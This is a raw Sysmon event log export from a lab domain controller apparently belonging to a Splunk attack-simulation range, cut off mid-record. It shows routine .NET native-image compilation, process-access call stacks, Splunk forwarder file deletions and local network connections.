10341000x800000000000000021059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.194{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F0-60D3-0804-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.178{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F0-60D3-0804-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.178{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F0-60D3-0804-00000000CF01}3356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:48.146{4DB9351A-A1EF-60D3-0704-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\154c-0\Microsoft.Windows.ServerManager.NPASRole.Plugin.dll2021-06-23 21:04:48.146 354300x800000000000000021055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.170{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61430-false10.0.1.12-8000- 10341000x800000000000000021054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:48.006{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EF-60D3-0704-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:49.834{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C343E0D756013E235F71277F953BD97,SHA256=E66DCAF849C41EC78ACBAB634088F36E814E1BB624817F8462F45D7BB4137282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:50.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6D3292B9A40070E0548C944B34826E0,SHA256=666F2DD24B5ACB17647652989DF0D7BF384261C6C430A5DE5691BC139531B07A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:51.918{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A713CC14FE9589644B8842009F976F7B,SHA256=E191D32E512C855D3F475C08111BCDB9EFF4B577DE201452A00653A42353AA8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:52.997{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=050C48D1A8587B1C88C4DDF830B5711C,SHA256=19E3A4F7A381B69E7B43D03930E899FD9A796D8AA3F92E1787EC53BA3E3CEA3B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.950{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F5-60D3-0C04-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.935{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F5-60D3-0C04-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.935{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F5-60D3-0C04-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.856{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F5-60D3-0B04-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.778{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F5-60D3-0B04-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.778{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F5-60D3-0B04-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.528{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A531BCDF756A24B0D8B34E560401FB9,SHA256=81D2508810CB4842D93730F5714FA0139C265044C33DF5B1FF437789F1231295,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:53.497{4DB9351A-A1F0-60D3-0904-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f00-0\Microsoft.Windows.ServerManager.Plugins.Ipam.dll2021-06-23 21:04:53.497 10341000x800000000000000021077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.247{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1F5-60D3-0A04-00000000CF01}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.247{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.247{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.247{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.247{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.247{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F5-60D3-0A04-00000000CF01}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.247{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F5-60D3-0A04-00000000CF01}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:53.107{4DB9351A-A1F5-60D3-0A04-00000000CF01}6120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000021069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:51.254{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61431-false10.0.1.12-8000- 10341000x800000000000000021119Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.981{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F6-60D3-1404-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.965{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F6-60D3-1404-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:54.965{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F6-60D3-1404-00000000CF01}640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 